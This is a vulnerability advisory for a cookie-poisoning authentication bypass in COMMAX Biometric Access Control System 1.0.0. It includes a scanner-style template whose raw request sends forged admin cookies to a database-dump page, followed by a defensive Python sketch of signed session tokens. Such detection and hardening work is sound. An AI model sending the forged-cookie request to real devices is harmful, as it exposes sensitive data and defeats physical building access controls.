commax-biometric-auth-bypass: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass

Date: 2025-08-01 | Affected software: COMMAX Biometric Access Control System | PoC: public

Vulnerability description

COMMAX Biometric Access Control System 1.0.0 suffers from an authentication bypass vulnerability. Through cookie poisoning, an unauthenticated attacker can bypass authentication, disclose sensitive information, and circumvent physical controls in smart homes and buildings.

PoC code [public]

id: commax-biometric-auth-bypass

info:
  name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
  author: gy741
  severity: critical
  description: |
    COMMAX Biometric Access Control System 1.0.0 suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
  reference:
    - https://www.exploit-db.com/exploits/50206
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
  metadata:
    max-request: 1
  tags: commax,auth-bypass,edb,vuln

http:
  - raw:
      - |
        GET /db_dump.php HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}/user_add.php
        Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>::: COMMAX :::</title>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022044535b875f7f2e249942e03eb6afc56e7365efa0cf250e98dc2f43d5e6cb710e02200c1d3f536afffc75025bbcfd9c54930a4b7ca4e65c1d30f9298d44adf8c77fe8:922c64590222798bb761d5b6d8e72950
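
An added example, not code from the product or from the template's author: a Python sketch contrasting an access check that trusts the client-supplied `CMX_ADMIN_LV` cookie (the behaviour the template's request implies) with one that accepts only a token signed by the server at login. `CMX_SESSION`, `SERVER_KEY`, the function names and the admin level of 9 are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-device secret held server-side and never sent to clients.
SERVER_KEY = secrets.token_bytes(32)
ADMIN_LEVEL = 9  # assumed from the template's CMX_ADMIN_LV=9


def parse_cookies(header: str) -> dict:
    """Split a Cookie header into a name -> value dict."""
    pairs = (item.split("=", 1) for item in header.split(";") if "=" in item)
    return {name.strip(): value.strip() for name, value in pairs}


def is_admin_trusting(header: str) -> bool:
    """Weak pattern (assumed): the privilege level is read straight from the client."""
    level = parse_cookies(header).get("CMX_ADMIN_LV", "")
    return level.isdigit() and int(level) >= ADMIN_LEVEL


def issue_session(admin_id: str, level: int, key: bytes = SERVER_KEY) -> str:
    """Called only after a successful login: bind identity and level to a MAC."""
    payload = f"{admin_id}|{level}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def is_admin_verified(header: str, key: bytes = SERVER_KEY) -> bool:
    """Hardened pattern: ignore CMX_* claims, accept only a valid signed token."""
    token = parse_cookies(header).get("CMX_SESSION", "")  # hypothetical cookie name
    parts = token.rsplit("|", 2)
    if len(parts) != 3:
        return False
    admin_id, level, tag = parts
    expected = hmac.new(key, f"{admin_id}|{level}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False
    return level.isdigit() and int(level) >= ADMIN_LEVEL


# Cookie header from the template's request: values no login ever issued.
POISONED = ("CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; "
            "CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0")
```

A production token would also carry an expiry and be tied to server-side session state; both are omitted here to keep the contrast visible.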
